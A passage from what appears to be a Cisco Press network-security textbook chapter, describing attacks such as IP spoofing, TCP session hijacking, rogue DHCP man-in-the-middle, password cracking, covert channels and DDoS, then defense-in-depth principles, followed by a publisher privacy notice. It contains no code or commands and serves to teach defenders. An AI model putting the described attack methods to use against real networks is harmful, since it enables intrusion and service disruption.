A ping sweep, also known as an Internet Control Message Protocol (ICMP) sweep, is a basic network-scanning technique that is used to determine which IP addresses map to live hosts (computers). A ping sweep consists of ICMP echo-requests (pings) sent to multiple hosts, whereas a single ping consists of ICMP echo-requests that are sent to one specific host computer. If a given address is live, that host returns an ICMP echo-reply. The goal of the ping sweep is to find hosts available on the network to probe for vulnerabilities. Ping sweeps are among the oldest and slowest methods that are used to scan a network.

IP Spoofing Attacks

The prime goal of an IP spoofing attack is to establish a connection that allows the attacker to gain root access to the host and to create a backdoor entry path into the target system.

IP spoofing is a technique used to gain unauthorized access to computers whereby the intruder sends messages to a computer with an IP address that indicates the message is coming from a trusted host. The attacker learns the IP address of a trusted host and modifies the packet headers so that it appears that the packets are coming from that trusted host.

At a high level, the concept of IP spoofing is easy to comprehend. Routers determine the best route between distant computers by examining the destination address, and ignore the source address. In a spoofing attack, an attacker outside your network pretends to be a trusted computer by using a trusted internal or external IP address.

If an attacker manages to change the routing tables to divert network packets to the spoofed IP address, the attacker can receive all the network packets addressed to the spoofed address and reply just as any trusted user can.

IP spoofing can also provide access to user accounts and passwords. For example, an attacker can emulate one of your internal users in ways that prove embarrassing for your organization. The attacker could send email messages to business partners that appear to have originated from someone within your organization. Such attacks are easier to perpetrate when an attacker has a user account and password, but they are also possible when attackers combine simple spoofing attacks with their knowledge of messaging protocols.

A rudimentary use of IP spoofing also involves bombarding a site with IP packets or ping requests, spoofing a source, a third-party registered public address. When the destination host receives the requests, it responds to what appears to be a legitimate request. If multiple hosts are attacked with spoofed requests, their collective replies to the third-party spoofed IP address create an unsupportable flood of packets, thus creating a DoS attack.

Sequence Prediction

The basis of IP spoofing during a TCP communication lies in an inherent security weakness known as sequence prediction. Hackers can guess or predict the TCP sequence numbers that are used to construct a TCP packet without receiving any responses from the server. Their prediction allows them to spoof a trusted host on a local network. To mount an IP spoofing attack, the hacker listens to communications between two systems. The hacker sends packets to the target system with the source IP address of the trusted system, as shown in Figure 1-5.

Figure 1-5

Figure 1-5. Sequence Number Prediction

If the packets from the hacker have the sequence numbers that the target system is expecting, and if these packets arrive before the packets from the real, trusted system, the hacker becomes the trusted host.

To engage in IP spoofing, hackers must first use a variety of techniques to find an IP address of a trusted host and then modify their packet headers to appear as though packets are coming from that trusted host. Further, the attacker can engage other unsuspecting hosts to generate traffic that appears as though it too is coming from the trusted host, thus flooding the network.

Trust Exploitation

Trust exploitation refers to an individual taking advantage of a trust relationship within a network.

As an example of trust exploitation, consider the network shown in Figure 1-6, where system A is in the demilitarized zone (DMZ) of a firewall. System B, located in the inside of the firewall, trusts System A. When a hacker on the outside network compromises System A in the DMZ, the attacker can leverage the trust relationship it has to gain access to System A.

Figure 1-6

Figure 1-6. Trust Exploitation

A DMZ can be seen as a semi-secure segment of your network. A DMZ is typically used to provide to outside users access to corporate resources, because these users are not allowed to reach inside servers directly. However, a DMZ server might be allowed to reach inside resources directly. In a trust exploitation attack, a hacker could hack a DMZ server and use it as a springboard to reach the inside network.

Several trust models may exist in a network:

  • Windows
    • Domains
    • Active Directory
  • Linux and UNIX
    • Network File System (NFS)
    • Network Information Services Plus (NIS+)
Password Attacks

Password attacks can be implemented using several methods, including brute-force attacks, Trojan horse programs, IP spoofing, keyloggers, packet sniffers, and dictionary attacks. Although packet sniffers and IP spoofing can yield user accounts and passwords, password attacks usually refer to repeated attempts to identify a user account, password, or both. These repeated attempts are called brute-force attacks.

To execute a brute-force attack, an attacker can use a program that runs across the network and attempts to log in to a shared resource, such as a server. When an attacker gains access to a resource, the attacker has the same access rights as the rightful user. If this account has sufficient privileges, the attacker can create a back door for future access, without concern for any status and password changes to the compromised user account.

Just as with packet sniffers and IP spoofing attacks, a brute-force password attack can provide access to accounts that attackers then use to modify critical network files and services. For example, an attacker compromises your network integrity by modifying your network routing tables. This trick reroutes all network packets to the attacker before transmitting them to their final destination. In such a case, an attacker can monitor all network traffic, effectively becoming a man in the middle.

Passwords present a security risk if they are stored as plain text. Thus, passwords must be encrypted in order to avoid risks. On most systems, passwords are processed through an encryption algorithm that generates a one-way hash on passwords. You cannot reverse a one-way hash back to its original text. Most systems do not decrypt the stored password during authentication; they store the one-way hash. During the login process, you supply an account and password, and the password encryption algorithm generates a one-way hash. The algorithm compares this hash to the hash stored on the system. If the hashes are the same, the algorithm assumes that the user supplied the proper password.

Remember that passing the password through an algorithm results in a password hash. The hash is not the encrypted password, but rather a result of the algorithm. The strength of the hash is such that the hash value can be re-created only by using the original user and password information, and that it is impossible to retrieve the original information from the hash. This strength makes hashes perfect for encoding passwords for storage. In granting authorization, the hashes, rather than the plain-text password, are calculated and compared.

Hackers use many tools and techniques to crack passwords:

  • Word lists: These programs use lists of words, phrases, or other combinations of letters, numbers, and symbols that computer users often use as passwords. Hackers enter word after word at high speed (called a dictionary attack) until they find a match.
  • Brute force: This approach relies on power and repetition. It compares every possible combination and permutation of characters until it finds a match. Brute force eventually cracks any password, but it might take a long, long time. Brute force is an extremely slow process because it uses every conceivable character combination.
  • Hybrid crackers: Some password crackers mix the two techniques. This combines the best of both methods and is highly effective against poorly constructed passwords.

Password cracking attacks any application or service that accepts user authentication, including the following:

  • NetBIOS over TCP (TCP 139)
  • Direct host (TCP 445)
  • FTP (TCP 21)
  • Telnet (TCP 23)
  • Simple Network Management Protocol (SNMP) (UDP 161)
  • Point-to-Point Tunneling Protocol (PPTP) (TCP 1723)
  • Terminal services (TCP 3389)
Confidentiality and Integrity Attacks

Confidentiality breaches can occur when an attacker attempts to obtain access to read-sensitive data. These attacks can be extremely difficult to detect because the attacker can copy sensitive data without the knowledge of the owner and without leaving a trace.

A confidentiality breach can occur simply because of incorrect file protections. For instance, a sensitive file could mistakenly be given global read access. Unauthorized copying or examination of the file would probably be difficult to track without having some type of audit mechanism running that logs every file operation. If a user had no reason to suspect unwanted access, however, the audit file would probably never be examined.

In Figure 1-7, the attacker is able to compromise an exposed web server. Using this server as a beachhead, the attacker then gains full access to the database server from which customer data is downloaded. The attacker then uses information from the database, such as a username, password, and email address, to intercept and read sensitive email messages destined for a user in the branch office. This attack is difficult to detect because the attacker did not modify or delete any data. The data was only read and downloaded. Without some kind of auditing mechanism on the server, it is unlikely that this attack will be discovered.

Figure 1-7

Figure 1-7. Breach of Confidentiality

Attackers can use many methods to compromise confidentiality, the most common of which are as follows:

  • Ping sweeps and port scanning: Searching a network host for open ports.
  • Packet sniffing: Intercepting and logging traffic that passes over a digital network or part of a network.
  • Emanations capturing: Capturing electrical transmissions from the equipment of an organization to deduce information regarding the organization.
  • Overt channels: Listening on obvious and visible communications. Overt channels can be used for covert communication.
  • Covert channels: Hiding information within a transmission channel that is based on encoding data using another set of events.
  • Wiretapping: Monitoring the telephone or Internet conversations of a third party, often covertly.
  • Social engineering: Using social skills or relationships to manipulate people inside the network to provide the information needed to access the network.
  • Dumpster diving: Searching through company dumpsters or trash cans looking for information, such as phone books, organization charts, manuals, memos, charts, and other documentation that can provide a valuable source of information for hackers.
  • Phishing: Attempting to criminally acquire sensitive information, such as usernames and passwords, by masquerading as trustworthy entities.
  • Pharming: Redirecting the traffic of a website to another, rogue website.

Many of these methods are used to compromise more than confidentiality. They are often elements of attacks on integrity and availability.

Man-in-the-Middle Attacks

A complex form of IP spoofing is called man-in-the-middle attack, where the hacker monitors the traffic that comes across the network and introduces himself as a stealth intermediary between the sender and the receiver, as shown in Figure 1-8.

Figure 1-8

Figure 1-8. IP Source Routing Attack

Hackers use man-in-the-middle attacks to perform many security violations:

  • Theft of information
  • Hijacking of an ongoing session to gain access to your internal network resources
  • Analysis of traffic to derive information about your network and its users
  • DoS
  • Corruption of transmitted data
  • Introduction of new information into network sessions

Attacks are blind or nonblind. A blind attack interferes with a connection that takes place from outside, where sequence and acknowledgment numbers are unreachable. A nonblind attack interferes with connections that cross wiring used by the hacker. A good example of a blind attack can be found at http://wiki.cas.mcmaster.ca/index.php/The_Mitnick_attack.

TCP session hijacking is a common variant of the man-in-the-middle attack. The attacker sniffs to identify the client and server IP addresses and relative port numbers. The attacker modifies his or her packet headers to spoof TCP/IP packets from the client, and then waits to receive an ACK packet from the client communicating with the server. The ACK packet contains the sequence number of the next packet that the client is expecting. The attacker replies to the client using a modified packet with the source address of the server and the destination address of the client. This packet results in a reset that disconnects the legitimate client. The attacker takes over communications with the server by spoofing the expected sequence number from the ACK that was previously sent from the legitimate client to the server. (This could also be an attack against confidentiality.)

Another cleaver man-in-the-middle attack is for the hacker to successfully introduce himself as the DHCP server on the network, providing its own IP address as the default gateway during the DHCP offer.

Overt and Covert Channels

Overt and covert channels refer to the capability to hide information within or using other information:

  • Overt channel: A transmission channel that is based on tunneling one protocol inside of another. It could be a clear-text transmission inserted inside another clear-text protocol header.
  • Covert channel: A transmission channel that is based on encoding data using another set of events. The data is concealed.

There are numerous ways that Internet protocols and the data that is transferred over them can provide overt and covert channels. The bad news is that firewalls generally cannot detect these channels; therefore, attackers can use them to receive confidential information in an unauthorized manner.

With an overt channel, one protocol is tunneled within another to bypass the security policy; for example, Telnet over FTP, instant messaging over HTTP, and IP over Post Office Protocol version 3 (POP3). Another example of an overt channel is using watermarks in JPEG images to leak confidential information.

One common use of overt channel is for instant messaging (IM). Most organization firewalls allow outbound HTTP but block IM. A user on the inside of the network can leak confidential information using IM over an HTTP session.

In Figure 1-9, the firewall allows outbound HTTP while a user on the inside of the network is leaking confidential information using instant messaging over HTTP.

Figure 1-9

Figure 1-9. Overt Channel

Steganography is another example of an overt channel. Steganography (from the Greek word steganos, meaning “covered” or “secret”) literally means covered or secret writing. The combination of CPU power and interest in privacy has led to the development of techniques for hiding messages in digital pictures and digitized audio.

For example, certain bits of a digital graphic can be used to hide messages. The key to knowing which bits are special is shared between two parties that want to communicate privately. The private message typically has so few bits relative to the total number of bits in the image that changing them is not visually noticeable. Without a direct comparison of the original and the processed image, it is practically impossible to tell that anything has been changed. Still, it might be detected by statistical analysis that detects non-randomness. This non-randomness in a file indicates that information is being passed inside of the file.

With a covert channel, information is encoded as another set of events. For example, an attacker could install a Trojan horse on a target host. The Trojan horse could be written to send binary information back to the server of the attacker. The client, infected with the Trojan horse, could return to the hacker’s server a ping status report in a binary format, where a 0 would represent a successful ping over a one-minute period, and a 1 would represent two successful pings over a one-minute period. The hacker could keep connectivity statistics for all the compromised clients he has around the world.

If ICMP is not permitted through a firewall, another tactic is to have the client visit the web page of the attacker. The Trojan horse software, now installed on the client, has a “call home” feature that automatically opens a connection to TCP port 80 at a specific IP address, the address of the hacker’s web server. All of this work is done so that the hacker can keep precise statistics of how many compromised workstations he possesses around the world. One visit per day would be represented by a 1, and no visits would be represented by a 0. As you might imagine, this technique is usually quite limited in bandwidth.

Phishing, Pharming, and Identity Theft

Identity theft continues to be a problem. In computing, phishing is an attempt to criminally acquire sensitive information, such as usernames, passwords, and credit card details, by masquerading as a trustworthy entity. Phishing is typically carried out by email or instant message (IM), although sometimes phone contact is attempted; the phisher often directs users to enter details at a website, as shown on the left in Figure 1-10. Phishing is an example of social engineering.

Figure 1-10

Figure 1-10. Phishing and Pharming Attacks

Pharming, also illustrated in Figure 1-10, is an attack aimed at redirecting the traffic of a website to another website. Pharming is conducted either by changing the hosts file on a victim computer or by exploiting a vulnerable Domain Name System (DNS) server. Pharming has become a major concern to businesses hosting e-commerce and online banking websites.

To protect against pharming, organizations implement “personalization” technologies, such as user-chosen images on the login page. Consider also supporting identified email initiatives such as DomainKeys Identified Mail (DKIM); these initiatives are beyond the scope of this book.

Availability Attacks

DoS attacks attempt to compromise the availability of a network, host, or application. They are considered a major risk because they can easily interrupt a business process and cause significant loss. These attacks are relatively simple to conduct, even by an unskilled attacker.

DoS attacks are usually the consequence of one of the following:

  • The failure of a host or application to handle an unexpected condition, such as maliciously formatted input data or an unexpected interaction of system components.
  • The inability of a network, host, or application to handle an enormous quantity of data, which crashes the system or brings it to a halt. Even if the firewall protects the corporate web server sitting on the DMZ from receiving a large amount of data and thus from crashing, the link connecting the corporation with its service provider will be totally clogged, and this bandwidth starvation will itself be a DoS.

Hackers can use many types of attacks to compromise availability:

  • Botnets
  • DoS
  • DDoS
  • SYN floods
  • ICMP floods
  • Electrical power
  • Computer environment

Botnets

Botnet is a term for a collection of software robots, or bots, that run autonomously and automatically. They run on groups of “zombie” computers controlled by crackers.

Although the term botnet can be used to refer to any group of bots, it is generally used to refer to a collection of compromised systems running worms, Trojan horses, or back doors, under a common command and control infrastructure. The originator of a botnet controls the group of computers remotely, usually through a means such as Internet Relay Chat (IRC).

Often, the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden. Generally, the attacker has compromised a large number of systems using various methods, such as exploits, buffer overflows, and so on. Newer bots automatically scan their environment and propagate using detected vulnerabilities and weak passwords. Sometimes a controller will hide an IRC server installation on an educational or corporate site, where high-speed connections can support a large number of other bots.

Several botnets have been found and removed from the Internet. The Dutch police found a 1.5-million node botnet (http://www.wisegeek.com/what-is-a-botnet.htm), and the Norwegian ISP Telenor disbanded a 10,000-node botnet. Large, coordinated international efforts to shut down botnets have also been initiated. Some estimates indicate that up to 25 percent of all personal computers are part of a botnet (http://everything.explained.at/Botnet/).

DoS and DDoS Attacks

DoS attacks are the most publicized form of attack. They are also among the most difficult to eliminate. A DoS attack on a server sends an extremely large volume of requests over a network or the Internet. These large volumes of requests cause the attacked server to slow down dramatically. Consequently, the attacked server becomes unavailable for legitimate access and use.

DoS attacks differ from most other attacks because DoS attacks do not try to gain access to your network or the information on your network. These attacks focus on making a service unavailable for normal use. Attackers typically accomplish this by exhausting some resource limitation on the network or within an operating system or application. These attacks typically require little effort to execute because they either take advantage of protocol weaknesses or use traffic normally allowed into a network. DoS attacks are among the most difficult to completely eliminate because of the way they use protocol weaknesses and accepted traffic to attack a network. Some hackers regard DoS attacks as trivial and in bad form because they require so little effort to execute. Still, because of their ease of implementation and potentially significant damage, DoS attacks deserve special attention from security administrators.

System administrators can install software fixes to limit the damage caused by all known DoS attacks. However, as with viruses, hackers constantly develop new DoS attacks.

A DDoS attack generates much higher levels of flooding traffic by using the combined bandwidth of multiple machines to target a single machine or network. The DDoS attack enlists a network of compromised machines that contain a remotely controlled agent, or zombie, attack program. A master control mechanism provides direction and control. When the zombies receive instructions from the master agent, they each begin generating malicious traffic aimed at the victim.

DDoS attacks are the “next generation” of DoS attacks on the Internet. This type of attack is not new. UDP and TCP SYN flooding, ICMP echo-request floods, and ICMP directed broadcasts (also known as Smurf attacks) are similar to DDoS attacks; however, the scope of the attack is new. Victims of DDoS attacks experience packet flooding from many different sources, possibly spoofed IP source addresses, which brings their network connectivity to a grinding halt. In the past, the typical DoS attack involved a single attempt to flood a target host with packets. With DDoS tools, an attacker can conduct the same attack using thousands of systems.

Figure 1-11 shows the process of a DDoS attack:

  1. The hacker uses a host to scan for systems to hack.
  2. After the hacker accesses handler systems, the hacker installs zombie software on them to scan, compromise, and infect agent systems.
  3. Remote control attack software is loaded on agent systems.
  4. When the hacker issues instructions to handlers on how to carry out the DDoS attack.
    Figure 1-11

    Figure 1-11. DDoS Attack

Blended Threats

The actual breach and vulnerability exploit is often accomplished using a combination of malware that infects, propagates, and delivers its payload following different techniques associated with traditional malware. Known as blended threats, these attack mechanisms combine the characteristics of viruses, worms, Trojan horses, spyware, and other malware.

A blended threat will exploit a vulnerability such as a buffer overflow or lack of HTTP input validation. Such attacks can spread without human intervention by scanning for other hosts to infect, embedding code in HTML, or by spamming, to name a few methods.

Blended threats plant Trojans and back doors. They are often part of botnet attacks, which try to raise privilege levels, create network shares, and steal data.

Most blended attacks are considered “zero day,” meaning that they have not been previously identified. Blended attacks are ever-evolving and pretested by cybercriminals on common antivirus products before they are released. These threats easily breach firewalls and open channels, and they represent a challenge to detect and mitigate.

Principles of Secure Network Design

In planning an overall strategy for security architecture design, sound principles are needed to accomplish an effective security posture. The selective combination of these principles provides the fundamentals for threat mitigation within the context of a security policy and risk management.

  • Defense in depth: This is an umbrella term that encompasses many of the other guidelines in this list. It is defined by architectures based on end-to-end security, using a layered approach. The objective is to create security domains and separate them by different types of security controls. The concept also defines redundancy of controls, where the failure of one layer is mitigated by the existence of other layers of controls.
  • Compartmentalization: Creating security domains is crucial. Different assets with different values should reside in different security domains, be it physically or logically. Granular trust relationships between compartments would mitigate attacks that try to gain a foothold in lower-security domains to exploit high-value assets in higher-security domains.
  • Least privilege: This principle applies a need-to-know approach to trust relationships between security domains. The idea, which originated in military and intelligence operations, is that if fewer people know about certain information, the risk of unauthorized access is diminished. In network security, this results in restrictive policies, where access to and from a security domain is allowed only for the required users, application, or network traffic. Everything else is denied by default.
  • Weakest link: This is a fundamental concept—a security system is as effective as its weakest link. A layered approach to security, with weaker or less protected assets residing in separated security domains, mitigates the necessary existence of these weakest links. Humans are often considered to be the weakest link in information security architectures.
  • Separation and rotation of duties: This is the concept of developing systems where more than one individual is required to complete a certain task. The principle is that this requirement can mitigate fraud and error. This applies to information security controls, and it applies to both technical controls and human procedures to manage those controls.
  • Hierarchically trusted components and protection: This principle applies a hierarchical approach to the compartmentalization and least privilege ideas, aiming at providing a more structured approach to data classification and security controls. The concept assumes that the hierarchy will be easier to implement and manage, resulting in similarly manageable and compartmentalized security controls.
  • Mediated access: This principle is based on centralizing security controls to protect groups of assets or security domains. In that sense, firewalls, proxies, and other security controls act on behalf of the assets they are designed to protect, and mediate the trust relationships between security domains. Special considerations should be in place to prevent the mediation component from becoming a single point of failure.
  • Accountability and traceability: This concept implies the existence of risk and the ability to manage and mitigate it, and not necessarily avoid or remove it. Information security architectures should provide mechanisms to track activity of users, attackers, and even security administrators. They should include provisions for accountability and nonrepudiation. This principle translates into specific functions, such as security audits, event management and monitoring, forensics, and others.

Cisco has always been a proponent of defense in depth. This was made clear in 2000 when it released its Cisco SAFE Blueprint for enterprise (SAFE is not an acronym), where it laid out its vision for defense in depth.

Defense in Depth

Addressing the fact that a security system is only as strong as its weakest link is often difficult when designing a system’s security. The complexity of modern systems makes it hard to identify each individual weak link, let alone the weakest one. Thus, it is often most desirable to eliminate possible weaknesses by instituting several concurrent security methods.

Securing information and systems against all threats requires multiple, overlapping protection approaches that address the human, technological, and operational aspects of information technology. Using multiple, overlapping protection approaches ensures that the system is never unprotected from the failure or circumvention of any individual protection approach.

When a system is designed and implemented, its quality should always be questioned through design reviews and testing. Identification of various failure modes might help a designer evaluate the probability of element failure, and identify the links that are the most critical for the security of the whole system. Many systems have a security-based single point of failure, an element of functionality or protection that, if compromised, would cause the compromise of the whole system. It is desirable to eliminate or at least harden such single points of failure in a high-assurance system.

Defense in depth is a philosophy that provides layered security to a system by using multiple security mechanisms:

  • Security mechanisms should back each other up and provide diversity and redundancy of protection.
  • Security mechanisms should not depend on each other, so that their security does not depend on other factors outside their control.
  • Using defense in depth, you can eliminate single points of failure and augment weak links in the system to provide stronger protection with multiple layers.

The defense-in-depth strategy recommends several principles:

  • Defend in multiple places: Given that insiders or outsiders can attack a target from multiple points, an organization must deploy protection mechanisms at multiple locations to resist all classes of attacks. At a minimum, you should include three defensive focus areas:
    • Defend the networks and infrastructure: Protect the local- and wide-area communications networks from attacks, such as DoS attacks. Provide confidentiality and integrity protection for data that is transmitted over the networks; for example, use encryption and traffic flow security measures to resist passive monitoring.
    • Defend the enclave boundaries: Deploy firewalls and intrusion detection systems (IDS) or intrusion prevention systems (IPS) or both to resist active network attacks.
    • Defend the computing environment: Provide access controls and host intrusion prevention systems (HIPS) on hosts and servers to resist insider, close-in, and distribution attacks.
  • Build layered defenses: Even the best available information assurance products have inherent weaknesses. Therefore, it is only a matter of time before an adversary finds an exploitable vulnerability. An effective countermeasure is to deploy multiple defense mechanisms between the adversary and the target. Each of these mechanisms must present unique obstacles to the adversary. Further, each mechanism should include both protection and detection measures. These measures increase the risk of detection for adversaries while reducing their chances of success, or make successful penetrations unaffordable. One example of a layered defense is to have nested firewalls (each coupled with IDS or IPS) that are deployed at outer and inner network boundaries. The inner firewalls may support more granular access control and data filtering.
  • Use robust components: Specify the security robustness (that is, strength and assurance) of each information assurance component as a function of the value of what it is protecting and the threat at the point of application. For example, it is often more effective and operationally suitable to deploy stronger mechanisms at the network boundaries than at the user desktop.
  • Employ robust key management: Deploy robust encryption key management and public key infrastructures that support all the incorporated information assurance technologies and that are highly resistant to attack.
  • Deploy an IDS or IPS: Deploy infrastructures to detect and prevent intrusions and to analyze and correlate the results and react accordingly. These infrastructures should help the operations staff answer the following questions:
    • Am I under attack?
    • Who is the source?
    • What is the target?
    • Who else is under attack?
    • What are my options?
2. Evaluating and Managing the Risk | Next Section

Cisco Press Promotional Mailings & Special Offers

I would like to receive exclusive offers and hear about products from Cisco Press and its family of brands. I can unsubscribe at any time.

Overview

Pearson Education, Inc., 221 River Street, Hoboken, New Jersey 07030, (Pearson) presents this site to provide information about Cisco Press products and services that can be purchased through this site.

This privacy notice provides an overview of our commitment to privacy and describes how we collect, protect, use and share personal information collected through this site. Please note that other Pearson websites and online products and services have their own separate privacy policies.

Collection and Use of Information

To conduct business and deliver products and services, Pearson collects and uses personal information in several ways in connection with this site, including:

Questions and Inquiries

For inquiries and questions, we collect the inquiry or question, together with name, contact details (email address, phone number and mailing address) and any other additional information voluntarily submitted to us through a Contact Us form or an email. We use this information to address the inquiry and respond to the question.

Online Store

For orders and purchases placed through our online store on this site, we collect order details, name, institution name and address (if applicable), email address, phone number, shipping and billing addresses, credit/debit card information, shipping options and any instructions. We use this information to complete transactions, fulfill orders, communicate with individuals placing orders or visiting the online store, and for related purposes.

Surveys

Pearson may offer opportunities to provide feedback or participate in surveys, including surveys evaluating Pearson products, services or sites. Participation is voluntary. Pearson collects information requested in the survey questions and uses the information to evaluate, support, maintain and improve products, services or sites; develop new products and services; conduct educational research; and for other purposes specified in the survey.

Contests and Drawings

Occasionally, we may sponsor a contest or drawing. Participation is optional. Pearson collects name, contact information and other information specified on the entry form for the contest or drawing to conduct the contest or drawing. Pearson may collect additional personal information from the winners of a contest or drawing in order to award the prize and for tax reporting purposes, as required by law.

Newsletters

If you have elected to receive email newsletters or promotional mailings and special offers but want to unsubscribe, simply email information@ciscopress.com.

Service Announcements

On rare occasions it is necessary to send out a strictly service related announcement. For instance, if our service is temporarily suspended for maintenance we might send users an email. Generally, users may not opt-out of these communications, though they can deactivate their account information. However, these communications are not promotional in nature.

Customer Service

We communicate with users on a regular basis to provide requested services and in regard to issues relating to their account we reply via email or phone in accordance with the users' wishes when a user submits their information through our Contact Us form.

Other Collection and Use of Information

Application and System Logs

Pearson automatically collects log data to help ensure the delivery, availability and security of this site. Log data may include technical information about how a user or visitor connected to this site, such as browser type, type of computer/device, operating system, internet service provider and IP address. We use this information for support purposes and to monitor the health of the site, identify problems, improve service, detect unauthorized access and fraudulent activity, prevent and respond to security incidents and appropriately scale computing resources.

Web Analytics

Pearson may use third party web trend analytical services, including Google Analytics, to collect visitor information, such as IP addresses, browser types, referring pages, pages visited and time spent on a particular site. While these analytical services collect and report information on an anonymous basis, they may use cookies to gather web trend information. The information gathered may enable Pearson (but not the third party web trend services) to link information with application and system log data. Pearson uses this information for system administration and to identify problems, improve service, detect unauthorized access and fraudulent activity, prevent and respond to security incidents, appropriately scale computing resources and otherwise support and deliver this site and its services.

Cookies and Related Technologies

This site uses cookies and similar technologies to personalize content, measure traffic patterns, control security, track use and access of information on this site, and provide interest-based messages and advertising. Users can manage and block the use of cookies through their browser. Disabling or blocking certain cookies may limit the functionality of this site.

Do Not Track

This site currently does not respond to Do Not Track signals.

Security

Pearson uses appropriate physical, administrative and technical security measures to protect personal information from unauthorized access, use and disclosure.

Children

This site is not directed to children under the age of 13.

Marketing

Pearson may send or direct marketing communications to users, provided that

  • Pearson will not use personal information collected or processed as a K-12 school service provider for the purpose of directed or targeted advertising.
  • Such marketing is consistent with applicable law and Pearson's legal obligations.
  • Pearson will not knowingly direct or send marketing communications to an individual who has expressed a preference not to receive marketing.
  • Where required by applicable law, express or implied consent to marketing exists and has not been withdrawn.

Pearson may provide personal information to a third party service provider on a restricted basis to provide marketing solely on behalf of Pearson or an affiliate or customer for whom Pearson is a service provider. Marketing preferences may be changed at any time.

Correcting/Updating Personal Information

If a user's personally identifiable information changes (such as your postal address or email address), we provide a way to correct or update that user's personal data provided to us. This can be done on the Account page. If a user no longer desires our service and desires to delete his or her account, please contact us at customer-service@informit.com and we will process the deletion of a user's account.

Choice/Opt-out

Users can always make an informed choice as to whether they should proceed with certain services offered by Cisco Press. If you choose to remove yourself from our mailing list(s) simply visit the following page and uncheck any communication you no longer want to receive: www.ciscopress.com/u.aspx.

Sale of Personal Information

Pearson does not rent or sell personal information in exchange for any payment of money.

While Pearson does not sell personal information, as defined in Nevada law, Nevada residents may email a request for no sale of their personal information to NevadaDesignatedRequest@pearson.com.

Supplemental Privacy Statement for California Residents

California residents should read our Supplemental privacy statement for California residents in conjunction with this Privacy Notice. The Supplemental privacy statement for California residents explains Pearson's commitment to comply with California law and applies to personal information of California residents collected in connection with this site and the Services.

Sharing and Disclosure

Pearson may disclose personal information, as follows:

  • As required by law.
  • With the consent of the individual (or their parent, if the individual is a minor)
  • In response to a subpoena, court order or legal process, to the extent permitted or required by law
  • To protect the security and safety of individuals, data, assets and systems, consistent with applicable law
  • In connection the sale, joint venture or other transfer of some or all of its company or assets, subject to the provisions of this Privacy Notice
  • To investigate or address actual or suspected fraud or other illegal activities
  • To exercise its legal rights, including enforcement of the Terms of Use for this site or another contract
  • To affiliated Pearson companies and other companies and organizations who perform work for Pearson and are obligated to protect the privacy of personal information consistent with this Privacy Notice
  • To a school, organization, company or government agency, where Pearson collects or processes the personal information in a school setting or on behalf of such organization, company or government agency.

Links

This web site contains links to other sites. Please be aware that we are not responsible for the privacy practices of such other sites. We encourage our users to be aware when they leave our site and to read the privacy statements of each and every web site that collects Personal Information. This privacy statement applies solely to information collected by this web site.

Requests and Contact

Please contact us about this Privacy Notice or if you have any requests or questions relating to the privacy of your personal information.

Changes to this Privacy Notice

We may revise this Privacy Notice through an updated posting. We will identify the effective date of the revision in the posting. Often, updates are made to provide greater clarity or to comply with changes in regulatory requirements. If the updates involve material changes to the collection, protection, use or disclosure of Personal Information, Pearson will provide notice of the change through a conspicuous notice on this site or other appropriate way. Continued use of the site after the effective date of a posted revision evidences acceptance. Please contact us if you have questions or concerns about the Privacy Notice or any objection to any revisions.

Last Update: November 17, 2020